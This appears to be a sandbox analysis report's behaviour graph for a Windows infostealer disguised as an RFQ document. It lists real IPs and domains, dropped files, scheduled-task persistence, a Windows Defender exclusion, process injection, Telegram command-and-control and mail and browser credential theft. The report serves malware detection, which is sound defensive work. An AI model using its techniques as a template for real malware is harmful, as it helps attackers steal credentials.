                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1618870 Sample: INQS_RFQ441632-A_Shenle_Cor... Startdate: 19/02/2025 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 3 other IPs or domains 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 12 other signatures 2->68 8 INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe 7 2->8         started        12 nDEusQ.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\Roaming\nDEusQ.exe, PE32 8->38 dropped 40 C:\Users\user\...\nDEusQ.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpF9F0.tmp, XML 8->42 dropped 44 INQS_RFQ441632-A_S...productions.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 14 INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Antivirus detection for dropped file 12->74 76 Multi AV Scanner detection for dropped file 12->76 78 Injects a PE file into a foreign processes 12->78 24 nDEusQ.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 mail.tmcksa.com 192.254.185.123, 49751, 49752, 587 UNIFIEDLAYER-AS-1US United States 14->52 54 api.telegram.org 149.154.167.220, 443, 49745, 49750 TELEGRAMRU United Kingdom 14->54 56 2 other IPs or domains 14->56 80 Loading BitLocker PowerShell Module 18->80 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 36 conhost.exe 26->36         started        signatures9 process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.